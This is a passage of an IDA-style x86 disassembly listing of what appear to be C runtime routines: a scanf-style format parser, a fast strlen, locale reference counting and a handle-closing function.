call sub_41C16B
pop ecx
test eax, eax
jnz short loc_4170E3
loc_41710D: ; CODE XREF: sub_416D3B+361�j
; sub_416D3B+36B�j ...
dec [ebp+var_30]
cmp ebx, 0FFFFFFFFh
jz short loc_41711E
push edi
push ebx
call sub_41C21E
pop ecx
pop ecx
loc_41711E: ; CODE XREF: sub_416D3B+3D8�j
cmp [ebp+var_40], 0
jz loc_4177A8
cmp [ebp+var_4B], 0
jnz loc_41771C
inc [ebp+var_34]
and byte ptr [esi], 0
lea eax, [ebp+var_1C8]
push eax
push [ebp+var_64]
movsx eax, [ebp+var_4F]
dec eax
push eax
call off_42DEA0
add esp, 0Ch
jmp loc_41771C
; ---------------------------------------------------------------------------
loc_417156: ; CODE XREF: sub_416D3B+22A�j
test ecx, ecx
jnz short loc_417164
mov [ebp+var_44], 1
inc [ebp+var_48]
loc_417164: ; CODE XREF: sub_416D3B+41D�j
; sub_416D3B+44A�j
cmp [ebp+var_4E], 0
jle loc_4172EF
mov [ebp+var_4D], 1
jmp loc_4172EF
; ---------------------------------------------------------------------------
loc_417177: ; CODE XREF: sub_416D3B+21B�j
mov eax, edi
sub eax, 70h
jz loc_4174E6
sub eax, 3
jz short loc_417164
dec eax
dec eax
jz loc_4174EA
sub eax, 3
jz loc_416FB4
sub eax, 3
jz short loc_4171C9
loc_41719D: ; CODE XREF: sub_416D3B+239�j
; sub_416D3B+24C�j
mov eax, [ebp+arg_4]
movzx eax, byte ptr [eax]
cmp eax, [ebp+var_28]
jz short loc_4171B1
loc_4171A8: ; CODE XREF: sub_416D3B+212�j
cmp [ebp+var_28], 0FFFFFFFFh
jmp loc_417778
; ---------------------------------------------------------------------------
loc_4171B1: ; CODE XREF: sub_416D3B+46B�j
dec [ebp+var_29]
cmp [ebp+var_4B], 0
jnz loc_41771C
mov eax, [ebp+var_60]
mov [ebp+arg_8], eax
jmp loc_41771C
; ---------------------------------------------------------------------------
loc_4171C9: ; CODE XREF: sub_416D3B+460�j
cmp [ebp+var_4E], 0
jle short loc_4171D3
mov [ebp+var_4D], 1
loc_4171D3: ; CODE XREF: sub_416D3B+492�j
mov edi, [ebp+arg_4]
inc edi
mov [ebp+arg_4], edi
mov [ebp+var_1CC], edi
cmp byte ptr [edi], 5Eh
jnz short loc_4171F0
inc edi
mov [ebp+var_1CC], edi
or [ebp+var_49], 0FFh
loc_4171F0: ; CODE XREF: sub_416D3B+4A8�j
mov ebx, [ebp+var_20]
test ebx, ebx
jnz short loc_417248
and [ebp+ms_exc.disabled], ebx
push 20h
pop eax
call sub_414630
mov [ebp+ms_exc.old_esp], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_417248
; ---------------------------------------------------------------------------
loc_417210: ; DATA XREF: .rdata:stru_428E48�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_417214: ; DATA XREF: .rdata:stru_428E48�o
mov esp, [ebp+ms_exc.old_esp]
call sub_419B68
push 20h
call sub_414CAD
pop ecx
mov [ebp+var_20], eax
test eax, eax
jnz short loc_417234
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp loc_4177A8
; ---------------------------------------------------------------------------
loc_417234: ; CODE XREF: sub_416D3B+4EE�j
mov [ebp+var_24], 1
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_1CC]
mov ebx, [ebp+var_20]
loc_417248: ; CODE XREF: sub_416D3B+4BA�j
; sub_416D3B+4D3�j
push 20h
push 0
push ebx
call sub_41C380
add esp, 0Ch
cmp [ebp+var_68], 7Bh
jnz short loc_4172CF
cmp byte ptr [edi], 5Dh
jnz short loc_4172CF
mov dl, 5Dh
inc edi
mov byte ptr [ebx+0Bh], 20h
jmp short loc_4172D2
; ---------------------------------------------------------------------------
loc_417269: ; CODE XREF: sub_416D3B+59B�j
inc edi
cmp al, 2Dh
jnz short loc_4172B9
test dl, dl
jz short loc_4172B9
mov cl, [edi]
cmp cl, 5Dh
jz short loc_4172B9
inc edi
cmp dl, cl
jnb short loc_417282
mov al, cl
jmp short loc_417286
; ---------------------------------------------------------------------------
loc_417282: ; CODE XREF: sub_416D3B+541�j
mov al, dl
mov dl, cl
loc_417286: ; CODE XREF: sub_416D3B+545�j
cmp dl, al
ja short loc_4172B5
movzx esi, dl
sub al, dl
inc al
movzx eax, al
mov [ebp+var_1D0], eax
loc_41729A: ; CODE XREF: sub_416D3B+578�j
mov eax, esi
shr eax, 3
add eax, ebx
mov ecx, esi
and ecx, 7
mov dl, 1
shl dl, cl
or [eax], dl
inc esi
dec [ebp+var_1D0]
jnz short loc_41729A
loc_4172B5: ; CODE XREF: sub_416D3B+54D�j
xor dl, dl
jmp short loc_4172D2
; ---------------------------------------------------------------------------
loc_4172B9: ; CODE XREF: sub_416D3B+531�j
; sub_416D3B+535�j ...
mov [ebp+var_39], al
movzx ecx, al
mov eax, ecx
shr eax, 3
add eax, ebx
and ecx, 7
mov dl, 1
shl dl, cl
or [eax], dl
loc_4172CF: ; CODE XREF: sub_416D3B+51E�j
; sub_416D3B+523�j
mov dl, [ebp+var_39]
loc_4172D2: ; CODE XREF: sub_416D3B+52C�j
; sub_416D3B+57C�j
mov al, [edi]
cmp al, 5Dh
jnz short loc_417269
test al, al
jz loc_4177A8
mov ebx, [ebp+var_64]
cmp [ebp+var_68], 7Bh
jnz short loc_4172EC
mov [ebp+arg_4], edi
loc_4172EC: ; CODE XREF: sub_416D3B+5AC�j
mov edi, [ebp+var_68]
loc_4172EF: ; CODE XREF: sub_416D3B+42D�j
; sub_416D3B+437�j
mov esi, ebx
dec [ebp+var_30]
cmp [ebp+var_28], 0FFFFFFFFh
jz short loc_417307
push [ebp+arg_0]
push [ebp+var_28]
call sub_41C21E
pop ecx
pop ecx
loc_417307: ; CODE XREF: sub_416D3B+5BD�j
; sub_416D3B+754�j ...
cmp [ebp+var_44], 0
jz short loc_41731B
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz loc_4174AD
loc_41731B: ; CODE XREF: sub_416D3B+5D0�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_416D25
mov [ebp+var_28], eax
cmp eax, 0FFFFFFFFh
jz loc_41749A
cmp edi, 63h
jz short loc_41737B
cmp edi, 73h
jnz short loc_41734B
cmp eax, 9
jl short loc_417346
cmp eax, 0Dh
jle short loc_41734B
loc_417346: ; CODE XREF: sub_416D3B+604�j
cmp eax, 20h
jnz short loc_41737B
loc_41734B: ; CODE XREF: sub_416D3B+5FF�j
; sub_416D3B+609�j
cmp edi, 7Bh
jnz loc_41749A
mov ecx, eax
and ecx, 7
xor edx, edx
inc edx
shl edx, cl
mov ecx, eax
sar ecx, 3
mov edi, [ebp+var_20]
movsx ecx, byte ptr [ecx+edi]
movsx edi, [ebp+var_49]
xor ecx, edi
test edx, ecx
jz loc_41749A
mov edi, [ebp+var_68]
loc_41737B: ; CODE XREF: sub_416D3B+5FA�j
; sub_416D3B+60E�j
cmp [ebp+var_4B], 0
jnz loc_417494
cmp [ebp+var_4D], 0
jz loc_417489
mov [ebp+var_1D4], al
movzx eax, al
mov ecx, off_42DEB0
test byte ptr [ecx+eax*2+1], 80h
jz short loc_4173B6
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_416D25
mov [ebp+var_1D3], al
loc_4173B6: ; CODE XREF: sub_416D3B+668�j
push dword_42E104
lea eax, [ebp+var_1D4]
push eax
lea eax, [ebp+var_1D8]
push eax
call sub_41C34A
add esp, 0Ch
mov ax, [ebp+var_1D8]
mov [ebx], ax
inc ebx
inc ebx
jmp loc_41748C
; ---------------------------------------------------------------------------
loc_4173E3: ; CODE XREF: sub_416D3B+27F�j
cmp ebx, 2Bh
jnz short loc_417406
loc_4173E8: ; CODE XREF: sub_416D3B+289�j
dec [ebp+var_48]
jnz short loc_4173F7
test ecx, ecx
jz short loc_4173F7
mov [ebp+var_4C], 1
jmp short loc_417406
; ---------------------------------------------------------------------------
loc_4173F7: ; CODE XREF: sub_416D3B+6B0�j
; sub_416D3B+6B4�j
inc [ebp+var_30]
mov edx, esi
call sub_416D25
mov ebx, eax
mov [ebp+var_28], ebx
loc_417406: ; CODE XREF: sub_416D3B+6AB�j
; sub_416D3B+6BA�j
cmp ebx, 30h
jnz loc_41751B
inc [ebp+var_30]
mov edx, esi
call sub_416D25
mov ebx, eax
mov [ebp+var_28], ebx
cmp bl, 78h
jz short loc_417463
cmp bl, 58h
jz short loc_417463
mov [ebp+var_40], 1
cmp edi, 78h
jz short loc_41744A
cmp [ebp+var_44], 0
jz short loc_417442
dec [ebp+var_48]
jnz short loc_417442
inc [ebp+var_4C]
loc_417442: ; CODE XREF: sub_416D3B+6FD�j
; sub_416D3B+702�j
push 6Fh
loc_417444: ; CODE XREF: sub_416D3B+74C�j
pop edi
jmp loc_41751B
; ---------------------------------------------------------------------------
loc_41744A: ; CODE XREF: sub_416D3B+6F7�j
dec [ebp+var_30]
cmp ebx, 0FFFFFFFFh
jz short loc_41745B
push esi
push ebx
call sub_41C21E
pop ecx
pop ecx
loc_41745B: ; CODE XREF: sub_416D3B+715�j
push 30h
pop ebx
jmp loc_417518
; ---------------------------------------------------------------------------
loc_417463: ; CODE XREF: sub_416D3B+6E6�j
; sub_416D3B+6EB�j
inc [ebp+var_30]
mov edx, esi
call sub_416D25
mov ebx, eax
mov [ebp+var_28], ebx
cmp [ebp+var_44], 0
jz short loc_417485
sub [ebp+var_48], 2
cmp [ebp+var_48], 1
jge short loc_417485
inc [ebp+var_4C]
loc_417485: ; CODE XREF: sub_416D3B+73B�j
; sub_416D3B+745�j
push 78h
jmp short loc_417444
; ---------------------------------------------------------------------------
loc_417489: ; CODE XREF: sub_416D3B+64E�j
mov [ebx], al
inc ebx
loc_41748C: ; CODE XREF: sub_416D3B+6A3�j
mov [ebp+var_64], ebx
jmp loc_417307
; ---------------------------------------------------------------------------
loc_417494: ; CODE XREF: sub_416D3B+644�j
inc esi
jmp loc_417307
; ---------------------------------------------------------------------------
loc_41749A: ; CODE XREF: sub_416D3B+5F1�j
; sub_416D3B+613�j ...
dec [ebp+var_30]
cmp eax, 0FFFFFFFFh
jz short loc_4174AD
push [ebp+arg_0]
push eax
call sub_41C21E
pop ecx
pop ecx
loc_4174AD: ; CODE XREF: sub_416D3B+5DA�j
; sub_416D3B+765�j
cmp esi, ebx
jz loc_4177A8
cmp [ebp+var_4B], 0
jnz loc_41771C
inc [ebp+var_34]
cmp [ebp+var_68], 63h
jz loc_41771C
mov eax, [ebp+var_64]
cmp [ebp+var_4D], 0
jz short loc_4174DE
and word ptr [eax], 0
jmp loc_41771C
; ---------------------------------------------------------------------------
loc_4174DE: ; CODE XREF: sub_416D3B+798�j
and byte ptr [eax], 0
jmp loc_41771C
; ---------------------------------------------------------------------------
loc_4174E6: ; CODE XREF: sub_416D3B+441�j
mov [ebp+var_4F], 1
loc_4174EA: ; CODE XREF: sub_416D3B+221�j
; sub_416D3B+233�j ...
mov ebx, [ebp+var_28]
cmp ebx, 2Dh
jnz short loc_4174F8
mov [ebp+var_4A], 1
jmp short loc_4174FD
; ---------------------------------------------------------------------------
loc_4174F8: ; CODE XREF: sub_416D3B+7B5�j
cmp ebx, 2Bh
jnz short loc_41751B
loc_4174FD: ; CODE XREF: sub_416D3B+7BB�j
dec [ebp+var_48]
jnz short loc_41750C
test ecx, ecx
jz short loc_41750C
mov [ebp+var_4C], 1
jmp short loc_41751B
; ---------------------------------------------------------------------------
loc_41750C: ; CODE XREF: sub_416D3B+7C5�j
; sub_416D3B+7C9�j
inc [ebp+var_30]
mov edx, esi
call sub_416D25
mov ebx, eax
loc_417518: ; CODE XREF: sub_416D3B+723�j
mov [ebp+var_28], ebx
loc_41751B: ; CODE XREF: sub_416D3B+6CE�j
; sub_416D3B+70A�j ...
cmp [ebp+var_54], 0
jz loc_417620
cmp [ebp+var_4C], 0
jnz loc_4175FE
loc_41752F: ; CODE XREF: sub_416D3B+8BA�j
cmp edi, 78h
jz short loc_41757A
cmp edi, 70h
jz short loc_41757A
push ebx
call sub_41C16B
pop ecx
test eax, eax
jz short loc_4175AB
cmp edi, 6Fh
jnz short loc_417563
cmp ebx, 38h
jge short loc_4175AB
mov eax, [ebp+var_5C]
mov ecx, [ebp+var_58]
shld ecx, eax, 3
shl eax, 3
mov [ebp+var_5C], eax
mov [ebp+var_58], ecx
jmp short loc_4175AE
; ---------------------------------------------------------------------------
loc_417563: ; CODE XREF: sub_416D3B+80C�j
push 0
push 0Ah
push [ebp+var_58]
push [ebp+var_5C]
call sub_414CC0
mov [ebp+var_5C], eax
mov [ebp+var_58], edx
jmp short loc_4175AE
; ---------------------------------------------------------------------------
loc_41757A: ; CODE XREF: sub_416D3B+7F7�j
; sub_416D3B+7FC�j
push ebx
call sub_41C1A5
pop ecx
test eax, eax
jz short loc_4175AB
mov eax, [ebp+var_5C]
mov ecx, [ebp+var_58]
shld ecx, eax, 4
shl eax, 4
mov [ebp+var_5C], eax
mov [ebp+var_58], ecx
push ebx
call sub_41C16B
pop ecx
test eax, eax
jnz short loc_4175AE
and ebx, 0FFFFFFDFh
sub ebx, 7
jmp short loc_4175AE
; ---------------------------------------------------------------------------
loc_4175AB: ; CODE XREF: sub_416D3B+807�j
; sub_416D3B+811�j ...
inc [ebp+var_4C]
loc_4175AE: ; CODE XREF: sub_416D3B+826�j
; sub_416D3B+83D�j ...
cmp [ebp+var_4C], 0
jnz short loc_4175E0
inc [ebp+var_40]
lea eax, [ebx-30h]
cdq
add [ebp+var_5C], eax
adc [ebp+var_58], edx
cmp [ebp+var_44], 0
jz short loc_4175D2
dec [ebp+var_48]
jnz short loc_4175D2
mov [ebp+var_4C], 1
jmp short loc_4175F1
; ---------------------------------------------------------------------------
loc_4175D2: ; CODE XREF: sub_416D3B+88A�j
; sub_416D3B+88F�j
inc [ebp+var_30]
mov edx, esi
call sub_416D25
mov ebx, eax
jmp short loc_4175F1
; ---------------------------------------------------------------------------
loc_4175E0: ; CODE XREF: sub_416D3B+877�j
dec [ebp+var_30]
cmp ebx, 0FFFFFFFFh
jz short loc_4175F1
push esi
push ebx
call sub_41C21E
pop ecx
pop ecx
loc_4175F1: ; CODE XREF: sub_416D3B+895�j
; sub_416D3B+8A3�j ...
cmp [ebp+var_4C], 0
jz loc_41752F
mov [ebp+var_28], ebx
loc_4175FE: ; CODE XREF: sub_416D3B+7EE�j
cmp [ebp+var_4A], 0
jz loc_4176DA
mov eax, [ebp+var_5C]
neg eax
mov ecx, [ebp+var_58]
adc ecx, 0
neg ecx
mov [ebp+var_5C], eax
mov [ebp+var_58], ecx
jmp loc_4176DA
; ---------------------------------------------------------------------------
loc_417620: ; CODE XREF: sub_416D3B+7E4�j
cmp [ebp+var_4C], 0
jnz loc_4176D1
loc_41762A: ; CODE XREF: sub_416D3B+98D�j
cmp edi, 78h
jz short loc_41765C
cmp edi, 70h
jz short loc_41765C
push ebx
call sub_41C16B
pop ecx
test eax, eax
jz short loc_41767E
cmp edi, 6Fh
jnz short loc_41764F
cmp ebx, 38h
jge short loc_41767E
shl [ebp+var_38], 3
jmp short loc_417681
; ---------------------------------------------------------------------------
loc_41764F: ; CODE XREF: sub_416D3B+907�j
mov eax, [ebp+var_38]
lea eax, [eax+eax*4]
shl eax, 1
mov [ebp+var_38], eax
jmp short loc_417681
; ---------------------------------------------------------------------------
loc_41765C: ; CODE XREF: sub_416D3B+8F2�j
; sub_416D3B+8F7�j
push ebx
call sub_41C1A5
pop ecx
test eax, eax
jz short loc_41767E
shl [ebp+var_38], 4
push ebx
call sub_41C16B
pop ecx
test eax, eax
jnz short loc_417681
and ebx, 0FFFFFFDFh
sub ebx, 7
jmp short loc_417681
; ---------------------------------------------------------------------------
loc_41767E: ; CODE XREF: sub_416D3B+902�j
; sub_416D3B+90C�j ...
inc [ebp+var_4C]
loc_417681: ; CODE XREF: sub_416D3B+912�j
; sub_416D3B+91F�j ...
cmp [ebp+var_4C], 0
jnz short loc_4176B3
inc [ebp+var_40]
mov eax, [ebp+var_38]
lea eax, [eax+ebx-30h]
mov [ebp+var_38], eax
cmp [ebp+var_44], 0
jz short loc_4176A5
dec [ebp+var_48]
jnz short loc_4176A5
mov [ebp+var_4C], 1
jmp short loc_4176C4
; ---------------------------------------------------------------------------
loc_4176A5: ; CODE XREF: sub_416D3B+95D�j
; sub_416D3B+962�j
inc [ebp+var_30]
mov edx, esi
call sub_416D25
mov ebx, eax
jmp short loc_4176C4
; ---------------------------------------------------------------------------
loc_4176B3: ; CODE XREF: sub_416D3B+94A�j
dec [ebp+var_30]
cmp ebx, 0FFFFFFFFh
jz short loc_4176C4
push esi
push ebx
call sub_41C21E
pop ecx
pop ecx
loc_4176C4: ; CODE XREF: sub_416D3B+968�j
; sub_416D3B+976�j ...
cmp [ebp+var_4C], 0
jz loc_41762A
mov [ebp+var_28], ebx
loc_4176D1: ; CODE XREF: sub_416D3B+8E9�j
cmp [ebp+var_4A], 0
jz short loc_4176DA
neg [ebp+var_38]
loc_4176DA: ; CODE XREF: sub_416D3B+8C7�j
; sub_416D3B+8E0�j ...
cmp edi, 46h
jnz short loc_4176E3
and [ebp+var_40], 0
loc_4176E3: ; CODE XREF: sub_416D3B+9A2�j
cmp [ebp+var_40], 0
jz loc_4177A8
cmp [ebp+var_4B], 0
jnz short loc_41771C
inc [ebp+var_34]
mov ebx, [ebp+var_64]
mov eax, [ebp+var_38]
loc_4176FC: ; CODE XREF: sub_416D3B+259�j
cmp [ebp+var_54], 0
jz short loc_41770F
mov eax, [ebp+var_5C]
mov [ebx], eax
mov eax, [ebp+var_58]
mov [ebx+4], eax
jmp short loc_41771C
; ---------------------------------------------------------------------------
loc_41770F: ; CODE XREF: sub_416D3B+9C5�j
cmp [ebp+var_4F], 0
jz short loc_417719
mov [ebx], eax
jmp short loc_41771C
; ---------------------------------------------------------------------------
loc_417719: ; CODE XREF: sub_416D3B+9D8�j
mov [ebx], ax
loc_41771C: ; CODE XREF: sub_416D3B+25F�j
; sub_416D3B+3F1�j ...
inc [ebp+var_29]
inc [ebp+arg_4]
jmp short loc_41778C
; ---------------------------------------------------------------------------
loc_417724: ; CODE XREF: sub_416D3B+90�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_416D25
mov ebx, eax
mov [ebp+var_28], ebx
movzx eax, byte ptr [esi]
inc esi
mov [ebp+arg_4], esi
cmp eax, ebx
jnz short loc_417775
movzx eax, bl
mov ecx, off_42DEB0
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41778C
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_416D25
movzx ecx, byte ptr [esi]
inc esi
mov [ebp+arg_4], esi
cmp ecx, eax
jz short loc_417789
cmp eax, 0FFFFFFFFh
jz short loc_417775
push [ebp+arg_0]
push eax
call sub_41C21E
pop ecx
pop ecx
loc_417775: ; CODE XREF: sub_416D3B+A02�j
; sub_416D3B+A2D�j
cmp ebx, 0FFFFFFFFh
loc_417778: ; CODE XREF: sub_416D3B+471�j
jz short loc_4177A8
push [ebp+arg_0]
push [ebp+var_28]
call sub_41C21E
pop ecx
pop ecx
jmp short loc_4177A8
; ---------------------------------------------------------------------------
loc_417789: ; CODE XREF: sub_416D3B+A28�j
dec [ebp+var_30]
loc_41778C: ; CODE XREF: sub_416D3B+9E7�j
; sub_416D3B+A12�j
cmp [ebp+var_28], 0FFFFFFFFh
jnz loc_416D69
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 25h
jnz short loc_4177A8
cmp byte ptr [eax+1], 6Eh
jz loc_416D69
loc_4177A8: ; CODE XREF: sub_416D3B+35�j
; sub_416D3B+3E7�j ...
cmp [ebp+var_24], 1
jnz short loc_4177B7
push [ebp+var_20]
call sub_414844
pop ecx
loc_4177B7: ; CODE XREF: sub_416D3B+A71�j
mov eax, [ebp+var_34]
cmp [ebp+var_28], 0FFFFFFFFh
jnz short loc_4177CC
test eax, eax
jnz short loc_4177CC
cmp [ebp+var_29], al
jnz short loc_4177CC
or eax, 0FFFFFFFFh
loc_4177CC: ; CODE XREF: sub_416D3B+A83�j
; sub_416D3B+A87�j ...
lea esp, [ebp-1E4h]
mov ecx, [ebp+var_1C]
xor ecx, [ebp+4]
call sub_41A026
call __SEH_epilog
retn
sub_416D3B endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4177F0 proc near ; CODE XREF: sub_4145F3+17�p
; sub_415994+D2�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_417820
loc_4177FC: ; CODE XREF: sub_4177F0+1B�j
mov al, [ecx]
add ecx, 1
test al, al
jz short loc_417853
test ecx, 3
jnz short loc_4177FC
add eax, 0
lea esp, [esp+0]
lea esp, [esp+0]
loc_417820: ; CODE XREF: sub_4177F0+A�j
; sub_4177F0+46�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_417820
mov eax, [ecx-4]
test al, al
jz short loc_417871
test ah, ah
jz short loc_417867
test eax, 0FF0000h
jz short loc_41785D
test eax, 0FF000000h
jz short loc_417853
jmp short loc_417820
; ---------------------------------------------------------------------------
loc_417853: ; CODE XREF: sub_4177F0+13�j
; sub_4177F0+5F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_41785D: ; CODE XREF: sub_4177F0+58�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_417867: ; CODE XREF: sub_4177F0+51�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_417871: ; CODE XREF: sub_4177F0+4D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_4177F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41787B proc near ; CODE XREF: sub_41471A+2A�p
; sub_41507A+37�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
lea ecx, [eax+1]
cmp ecx, 100h
mov ecx, [ebp+arg_0]
ja short loc_417899
mov ecx, [ecx+48h]
movzx eax, word ptr [ecx+eax*2]
jmp short loc_4178ED
; ---------------------------------------------------------------------------
loc_417899: ; CODE XREF: sub_41787B+13�j
push esi
mov edx, eax
sar edx, 8
push edi
mov edi, [ecx+48h]
movzx esi, dl
test byte ptr [edi+esi*2+1], 80h
pop edi
pop esi
jz short loc_4178BE
and [ebp+var_2], 0
push 2
mov [ebp+var_3], al
mov [ebp+var_4], dl
pop eax
jmp short loc_4178C8
; ---------------------------------------------------------------------------
loc_4178BE: ; CODE XREF: sub_41787B+32�j
and [ebp+var_3], 0
mov [ebp+var_4], al
xor eax, eax
inc eax
loc_4178C8: ; CODE XREF: sub_41787B+41�j
push 1
push dword ptr [ecx+14h]
push dword ptr [ecx+4]
lea ecx, [ebp+arg_4+2]
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_41C3E0
add esp, 1Ch
test eax, eax
jnz short loc_4178E9
leave
retn
; ---------------------------------------------------------------------------
loc_4178E9: ; CODE XREF: sub_41787B+6A�j
movzx eax, word ptr [ebp+arg_4+2]
loc_4178ED: ; CODE XREF: sub_41787B+1C�j
and eax, [ebp+arg_8]
leave
retn
sub_41787B endp
; =============== S U B R O U T I N E =======================================
sub_4178F2 proc near ; CODE XREF: sub_4179BC+B7�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+3Ch]
push edi
xor edi, edi
cmp eax, dword_47C4B0
jz short loc_417968
cmp eax, edi
jz short loc_417968
mov eax, [esi+2Ch]
cmp [eax], edi
jnz short loc_417968
mov eax, [esi+34h]
cmp eax, edi
jz short loc_417933
cmp [eax], edi
jnz short loc_417933
cmp eax, dword_47C630
jz short loc_417933
push eax
call sub_414844
push dword ptr [esi+3Ch]
call sub_41C789
pop ecx
pop ecx
loc_417933: ; CODE XREF: sub_4178F2+23�j
; sub_4178F2+27�j ...
mov eax, [esi+30h]
cmp eax, edi
jz short loc_417956
cmp [eax], edi
jnz short loc_417956
cmp eax, dword_47C634
jz short loc_417956
push eax
call sub_414844
push dword ptr [esi+3Ch]
call sub_41C72A
pop ecx
pop ecx
loc_417956: ; CODE XREF: sub_4178F2+46�j
; sub_4178F2+4A�j ...
push dword ptr [esi+2Ch]
call sub_414844
push dword ptr [esi+3Ch]
call sub_414844
pop ecx
pop ecx
loc_417968: ; CODE XREF: sub_4178F2+11�j
; sub_4178F2+15�j ...
mov eax, [esi+40h]
cmp eax, dword_47C62C
jz short loc_41798B
cmp eax, edi
jz short loc_41798B
cmp [eax], edi
jnz short loc_41798B
push eax
call sub_414844
push dword ptr [esi+44h]
call sub_414844
pop ecx
pop ecx
loc_41798B: ; CODE XREF: sub_4178F2+7F�j
; sub_4178F2+83�j ...
mov eax, [esi+50h]
cmp eax, dword_47C4AC
jz short loc_4179B2
cmp eax, edi
jz short loc_4179B2
cmp [eax+0B4h], edi
jnz short loc_4179B2
push eax
call sub_41C59A
push dword ptr [esi+50h]
call sub_414844
pop ecx
pop ecx
loc_4179B2: ; CODE XREF: sub_4178F2+A2�j
; sub_4178F2+A6�j ...
push esi
call sub_414844
pop ecx
pop edi
pop esi
retn
sub_4178F2 endp
; =============== S U B R O U T I N E =======================================
sub_4179BC proc near ; CODE XREF: sub_417A7E+18�p
push esi
call sub_416C45
mov esi, eax
mov eax, [esi+64h]
cmp eax, off_42D84C
jz loc_417A79
test eax, eax
jz short loc_417A06
mov ecx, [eax+2Ch]
dec dword ptr [eax]
test ecx, ecx
jz short loc_4179E2
dec dword ptr [ecx]
loc_4179E2: ; CODE XREF: sub_4179BC+22�j
mov ecx, [eax+34h]
test ecx, ecx
jz short loc_4179EB
dec dword ptr [ecx]
loc_4179EB: ; CODE XREF: sub_4179BC+2B�j
mov ecx, [eax+30h]
test ecx, ecx
jz short loc_4179F4
dec dword ptr [ecx]
loc_4179F4: ; CODE XREF: sub_4179BC+34�j
mov ecx, [eax+40h]
test ecx, ecx
jz short loc_4179FD
dec dword ptr [ecx]
loc_4179FD: ; CODE XREF: sub_4179BC+3D�j
mov ecx, [eax+4Ch]
dec dword ptr [ecx+0B4h]
loc_417A06: ; CODE XREF: sub_4179BC+19�j
mov ecx, off_42D84C
mov [esi+64h], ecx
mov ecx, off_42D84C
inc dword ptr [ecx]
mov ecx, off_42D84C
mov ecx, [ecx+2Ch]
test ecx, ecx
jz short loc_417A26
inc dword ptr [ecx]
loc_417A26: ; CODE XREF: sub_4179BC+66�j
mov ecx, off_42D84C
mov ecx, [ecx+34h]
test ecx, ecx
jz short loc_417A35
inc dword ptr [ecx]
loc_417A35: ; CODE XREF: sub_4179BC+75�j
mov ecx, off_42D84C
mov ecx, [ecx+30h]
test ecx, ecx
jz short loc_417A44
inc dword ptr [ecx]
loc_417A44: ; CODE XREF: sub_4179BC+84�j
mov ecx, off_42D84C
mov ecx, [ecx+40h]
test ecx, ecx
jz short loc_417A53
inc dword ptr [ecx]
loc_417A53: ; CODE XREF: sub_4179BC+93�j
mov ecx, off_42D84C
mov ecx, [ecx+4Ch]
inc dword ptr [ecx+0B4h]
test eax, eax
jz short loc_417A79
cmp dword ptr [eax], 0
jnz short loc_417A79
cmp eax, offset dword_42D7F8
jz short loc_417A79
push eax
call sub_4178F2
pop ecx
loc_417A79: ; CODE XREF: sub_4179BC+11�j
; sub_4179BC+A8�j ...
mov eax, [esi+64h]
pop esi
retn
sub_4179BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417A7E proc near ; CODE XREF: sub_41471A+12�p
; sub_414F66+24�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_428FD8
call __SEH_prolog
push 0Ch
call sub_4180B5
pop ecx
and [ebp+ms_exc.disabled], 0
call sub_4179BC
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_417AB0
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_417A7E endp
; =============== S U B R O U T I N E =======================================
sub_417AB0 proc near ; CODE XREF: sub_417A7E+24�p
; DATA XREF: .rdata:stru_428FD8�o
push 0Ch
call sub_418021
pop ecx
retn
sub_417AB0 endp
; =============== S U B R O U T I N E =======================================
sub_417AB9 proc near ; CODE XREF: sub_417B3C+4C�p
; sub_41D38D+2DC�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
push esi
call sub_41CB4B
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_417B07
cmp esi, 1
jz short loc_417AD5
cmp esi, 2
jnz short loc_417AEB
loc_417AD5: ; CODE XREF: sub_417AB9+15�j
push 2
call sub_41CB4B
push 1
mov edi, eax
call sub_41CB4B
cmp eax, edi
pop ecx
pop ecx
jz short loc_417B07
loc_417AEB: ; CODE XREF: sub_417AB9+1A�j
push esi
call sub_41CB4B
pop ecx
push eax
call ds:dword_42003C ; CloseHandle
test eax, eax
jnz short loc_417B07
call ds:dword_420008 ; RtlGetLastWin32Error
mov edi, eax
jmp short loc_417B09
; ---------------------------------------------------------------------------
loc_417B07: ; CODE XREF: sub_417AB9+10�j
; sub_417AB9+30�j ...
xor edi, edi
loc_417B09: ; CODE XREF: sub_417AB9+4C�j
push esi
call sub_41CACC
mov eax, esi
